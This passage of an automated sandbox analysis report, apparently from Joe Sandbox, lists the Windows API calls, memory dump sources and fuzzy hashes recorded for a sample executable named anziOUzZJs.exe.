                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: InitializeMessageSendUninitialize
                                      • String ID:
                                      • API String ID: 2896919175-0
                                      • Opcode ID: 6abcb503da36ffa97e6d3a1e0f86c88eeef9b2304b7b5e8d823ec30a8e2ca1ea
                                      • Instruction ID: 217987375aced081d1e1e684f869fbcf2dfeeb51b4bb814d2c2c1d189237c18b
                                      • Opcode Fuzzy Hash: 6abcb503da36ffa97e6d3a1e0f86c88eeef9b2304b7b5e8d823ec30a8e2ca1ea
                                      • Instruction Fuzzy Hash: 06F0F6F2904202A7DB605F109C0071A77B4DBD4346F40403EFE04722A0D67E89428A9D
                                      APIs
                                      • ShowWindow.USER32(00010472), ref: 00401579
                                      • ShowWindow.USER32(0001046C), ref: 0040158E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ShowWindow
                                      • String ID:
                                      • API String ID: 1268545403-0
                                      • Opcode ID: eefc9c2eba5680e91e0ebc83984cde26ecf89c5aeacf34c607b8bcbd51dc0c8b
                                      • Instruction ID: 6a1362a081380b38d7ea923c07575874152cb2511cc7df5c202f84d8e6e7dbc6
                                      • Opcode Fuzzy Hash: eefc9c2eba5680e91e0ebc83984cde26ecf89c5aeacf34c607b8bcbd51dc0c8b
                                      • Instruction Fuzzy Hash: AEF0E577B182806FDB25DB74EE8086E7BF6DB9531075901BFD101A3591C2B89C08D728
                                      APIs
                                      • GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                        • Part of subcall function 00406024: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
                                        • Part of subcall function 00406024: wsprintfA.USER32 ref: 00406074
                                        • Part of subcall function 00406024: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                      • String ID:
                                      • API String ID: 2547128583-0
                                      • Opcode ID: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                      • Instruction ID: f390ed2799c289b087c769a87f24dfac638062b8da6604b2acd18c4b1555f769
                                      • Opcode Fuzzy Hash: ad31075058678b318fb1acd60a85244af91915838e2bda58b2d8d9f4dd3fd24d
                                      • Instruction Fuzzy Hash: B4E08632644111A6D320A7709D0493B72EC9E84710302483EF906F2191D738AC259669
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00405970
                                      • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: File$AttributesCreate
                                      • String ID:
                                      • API String ID: 415043291-0
                                      • Opcode ID: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                      • Instruction ID: 2848333a8a5b20597e43067d17cc290ce391feab13c7f73248cb22e1b8f9cacf
                                      • Opcode Fuzzy Hash: 8635a13517db9147ca88e6c1994c1e63e85e115acab2f3846d9047911b568965
                                      • Instruction Fuzzy Hash: 5CD09E31658301AFEF098F20DD16F2EBAA2EB84B01F10962CBA82950E0D6755C159B26
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(?,?,0040555F,?,?,00000000,00405742,?,?,?,?), ref: 0040594C
                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405960
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                      • Instruction ID: 96e5362f07f59601f7516fe8bcac2aa0a8151a45168581d09323fa3b8cc485cf
                                      • Opcode Fuzzy Hash: 123b2631ce2b274a689f6f42d71c67174a47df8962c272e460887a4e83ced065
                                      • Instruction Fuzzy Hash: F7D01272908121AFC2102738ED0C89BBF65EB543717058B35FDB9F22F0D7304C568AA6
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(?,00000000,004030CC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 0040545B
                                      • GetLastError.KERNEL32 ref: 00405469
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CreateDirectoryErrorLast
                                      • String ID:
                                      • API String ID: 1375471231-0
                                      • Opcode ID: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                      • Instruction ID: ace853db513f64caea17b5c73fb52fb3118c2a3fabff3065b7385b8b337d2f64
                                      • Opcode Fuzzy Hash: 5a69f4d8b5a7b583b3b8a13bd9b089cb74a3312a80339e25d7f83e3ab18a8421
                                      • Instruction Fuzzy Hash: 9DC08C30B18101EAC6100B30AE087073D50AB00742F1444356206E10E0C6309050CD2F
                                      APIs
                                      • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 0040172B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: PathSearch
                                      • String ID:
                                      • API String ID: 2203818243-0
                                      • Opcode ID: 985a7ae01e69da493872186c6c10ed37eba87bebab26c0abac89a8346f6e59b4
                                      • Instruction ID: 4c956aff6f0d258c6848a8c99906dcba9d38e98bcd0b2081640ab90df76b8672
                                      • Opcode Fuzzy Hash: 985a7ae01e69da493872186c6c10ed37eba87bebab26c0abac89a8346f6e59b4
                                      • Instruction Fuzzy Hash: E5E0D8B2204100ABE700DB549D48FAA3798DB10368B30853BF201A50C1D2B89A459629
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402B6C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
                                      • Instruction ID: 6913ff832cf321f63cdd7bb00c8cc70b6829a5dd8220bacc95ff598af340a114
                                      • Opcode Fuzzy Hash: 11541d565f05363a0d465782138c1ad9d83dbb2602eb40d854f4a90bf0086a6c
                                      • Instruction Fuzzy Hash: 7FE04FB6240108AFDB00DFA4DD46F9577FCE718701F008021B608D7091C674E5508B69
                                      APIs
                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040305C,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405A27
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                      • Instruction ID: edb1125888c6416cb1e0b95ca9609c2ac4c4c792cbd4e8f88826aa2405e91300
                                      • Opcode Fuzzy Hash: d04482319dc3028e4ce08f739f1cf32aeeec85f3b87b0f01a1fec36d148a5575
                                      • Instruction Fuzzy Hash: D7E0EC3261425EEFDF109E659C40AEB7B6DEB053A4F048532FD25E2150E271E8219FB5
                                      APIs
                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040308E,00000000,00000000,00402EEB,000000FF,00000004,00000000,00000000,00000000), ref: 004059F8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FileRead
                                      • String ID:
                                      • API String ID: 2738559852-0
                                      • Opcode ID: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                      • Instruction ID: 6c2e581bc83b2d89c4a498056592e8f52b2bea012b9e1656670f40d352b29975
                                      • Opcode Fuzzy Hash: 9e9b74a17ccb5deaff559da35202fcfca8c983c6050daaa8761ff941af9ce947
                                      • Instruction Fuzzy Hash: 4DE0EC3272429AABDF109E559C44EEF7BACEB05360F048932FD15E3190D235ED219FA9
                                      APIs
                                      • SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F3C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                      • Instruction ID: b8addb9e81407d18270a6acc8ad8b47d243914a4c892372c87671a3bfdf31127
                                      • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                      • Instruction Fuzzy Hash: B6C04C71B482017AEA21CB509D49F0677686750B01F5584757210E50D0C6B4E451D62D
                                      APIs
                                      • SendMessageA.USER32(00000028,?,00000001,00403D44), ref: 00403F21
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                      • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                      • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                      • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                      APIs
                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E2D,?), ref: 0040309F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: FilePointer
                                      • String ID:
                                      • API String ID: 973152223-0
                                      • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                      • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                      • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                      APIs
                                      • KiUserCallbackDispatcher.NTDLL(?,00403CDD), ref: 00403F0A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CallbackDispatcherUser
                                      • String ID:
                                      • API String ID: 2492992576-0
                                      • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                      • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                      • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                      • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                      APIs
                                      • GetDlgItem.USER32(?,000003F9), ref: 004048A7
                                      • GetDlgItem.USER32(?,00000408), ref: 004048B2
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004048FC
                                      • LoadBitmapA.USER32(0000006E), ref: 0040490F
                                      • SetWindowLongA.USER32(?,000000FC,00404E86), ref: 00404928
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040493C
                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 0040494E
                                      • SendMessageA.USER32(?,00001109,00000002), ref: 00404964
                                      • SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404970
                                      • SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 00404982
                                      • DeleteObject.GDI32(00000000), ref: 00404985
                                      • SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049B0
                                      • SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049BC
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A51
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404A7C
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A90
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00404ABF
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404ACD
                                      • ShowWindow.USER32(?,00000005), ref: 00404ADE
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404BDB
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C40
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C55
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404C79
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404C99
                                      • ImageList_Destroy.COMCTL32(00000000), ref: 00404CAE
                                      • GlobalFree.KERNEL32(00000000), ref: 00404CBE
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D37
                                      • SendMessageA.USER32(?,00001102,?,?), ref: 00404DE0
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404DEF
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404E0F
                                      • ShowWindow.USER32(?,00000000), ref: 00404E5D
                                      • GetDlgItem.USER32(?,000003FE), ref: 00404E68
                                      • ShowWindow.USER32(00000000), ref: 00404E6F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N
                                      • API String ID: 1638840714-813528018
                                      • Opcode ID: 8b0289ef19e9e7d4f6956f04046df2f7fedd754f5cc9c605ccbb11d5e9afe659
